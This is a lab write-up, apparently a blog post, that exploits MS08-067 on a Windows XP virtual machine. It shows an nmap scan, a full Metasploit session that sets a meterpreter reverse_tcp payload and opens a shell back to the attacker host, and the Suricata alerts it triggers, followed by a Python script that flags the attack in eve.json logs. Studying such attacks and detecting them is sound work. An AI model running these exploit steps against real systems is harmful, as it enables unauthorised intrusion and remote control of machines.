Penetration Testing on Windows XP SP2/SP3 by Exploiting a Vulnerability in the Windows SMB Service {MS08-067}.

{Requirements:}
————————
All machines are running as VMs.

1. Kali Linux (172.16.66.193)
2. Windows XP SP2 (172.16.66.199)
3. IDS - Suricata

{Scan for open ports:}
———————————
root@fikri:~# nmap -n -sV 172.16.66.199

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-17 10:25 MYT
Nmap scan report for 172.16.66.199
Host is up (0.11s latency).
Not shown: 918 closed ports, 79 filtered ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows 98 netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:D1:55:23 (VMware)
Service Info: OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.51 seconds


{Exploit:}
—————
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 172.16.66.199
RHOST => 172.16.66.199
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    172.16.66.199    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 172.16.66.193
LHOST => 172.16.66.193
msf exploit(ms08_067_netapi) > set LPORT 6666
LPORT => 6666
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.66.193:6666
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 172.16.66.199
[*] Meterpreter session 1 opened (172.16.66.193:6666 -> 172.16.66.199:1069) at 2015-12-17 10:41:14 +0800

{Suricata}
—————

12/17/2015-10:41:18.639748  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable Code was Detected] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445
12/17/2015-10:41:18.639748  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable Code was Detected] [Priority: 1] {TCP} 172.16.66.193:43859 -> 172.16.66.199:445

{"timestamp":"2015-12-17T10:25:50.527735","event_type":"http","src_ip":"172.16.66.193","src_port":35357,"dest_ip":"172.16.66.199","dest_port":139,"proto":"TCP","http":{"url":"\/","http_method":"GET","protocol":"HTTP\/1.0","length":0}}
{"timestamp":"2015-12-17T10:25:50.527735","event_type":"http","src_ip":"172.16.66.193","src_port":35357,"dest_ip":"172.16.66.199","dest_port":139,"proto":"TCP","http":{"url":"\/","http_method":"GET","protocol":"HTTP\/1.0","length":0}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2008705,"rev":5,"signature":"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2009247,"rev":3,"signature":"ET SHELLCODE Rothenburg Shellcode","category":"Executable Code was Detected","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2008705,"rev":5,"signature":"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2009247,"rev":3,"signature":"ET SHELLCODE Rothenburg Shellcode","category":"Executable Code was Detected","severity":1}}
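The fast.log and eve.json output above shows the MS08-067 NETAPI overflow signature (sid 2008705) and the Rothenburg shellcode signature (sid 2009247) firing on the same TCP flow, each logged twice with an identical timestamp. The following Python script is an added example, not part of the original write-up: it parses eve.json records, collapses the doubled entries, and flags flows on which both the overflow and the shellcode signature fired, which is the combination worth escalating over either alert alone. The two signature IDs are taken from the alerts above; the embedded sample log (fields trimmed, plus one malformed line) and all function names are constructed for this example.

```python
import json
from collections import defaultdict

# Constructed sample in the eve.json shape shown above (fields trimmed to the ones used):
# one http event from the scan phase, the two alerts and their verbatim duplicates, and one malformed line.
EVE_LOG = "\n".join([
    '{"timestamp":"2015-12-17T10:25:50.527735","event_type":"http","src_ip":"172.16.66.193","src_port":35357,"dest_ip":"172.16.66.199","dest_port":139,"proto":"TCP"}',
    '{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"signature_id":2008705,"signature":"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)","severity":1}}',
    '{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"signature_id":2009247,"signature":"ET SHELLCODE Rothenburg Shellcode","severity":1}}',
    '{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"signature_id":2008705,"signature":"ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15)","severity":1}}',
    '{"timestamp":"2015-12-17T10:41:18.639748","event_type":"alert","src_ip":"172.16.66.193","src_port":43859,"dest_ip":"172.16.66.199","dest_port":445,"proto":"TCP","alert":{"signature_id":2009247,"signature":"ET SHELLCODE Rothenburg Shellcode","severity":1}}',
    'truncated line that is not JSON',
])

MS08_067_SID = 2008705   # ET NETBIOS ... NETAPI Stack Overflow Inbound - MS08-067 (from the alerts above)
SHELLCODE_SID = 2009247  # ET SHELLCODE Rothenburg Shellcode (from the alerts above)

def parse_alerts(text):
    """Parse eve.json lines; keep only alert events, skip other event types and malformed lines."""
    alerts = []
    for line in text.splitlines():
        try:
            ev = json.loads(line)
        except ValueError:
            continue
        if ev.get("event_type") == "alert":
            alerts.append(ev)
    return alerts

def flows_by_signature(alerts):
    """Map each 5-tuple flow to the signature IDs seen on it, collapsing identical (flow, timestamp, sid) records."""
    seen = set()
    flows = defaultdict(set)
    for ev in alerts:
        flow = (ev["src_ip"], ev["src_port"], ev["dest_ip"], ev["dest_port"], ev["proto"])
        sid = ev["alert"]["signature_id"]
        if (flow, ev["timestamp"], sid) in seen:
            continue  # duplicate record, as in the doubled lines above
        seen.add((flow, ev["timestamp"], sid))
        flows[flow].add(sid)
    return dict(flows)

def exploitation_attempts(flows):
    """Flows on which both the MS08-067 overflow and the shellcode signature fired: trigger plus payload on one connection."""
    return sorted(f for f, sids in flows.items() if {MS08_067_SID, SHELLCODE_SID} <= sids)

if __name__ == "__main__":
    for flow in exploitation_attempts(flows_by_signature(parse_alerts(EVE_LOG))):
        print("MS08-067 exploitation attempt on flow %s:%d -> %s:%d/%s" % flow)
```

On the sample this reports one flow, 172.16.66.193:43859 -> 172.16.66.199:445/TCP, matching the session Metasploit opened above.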

{References:}
1. https://community.rapid7.com/community/infosec/blog/2014/02/03/new-ms08-067

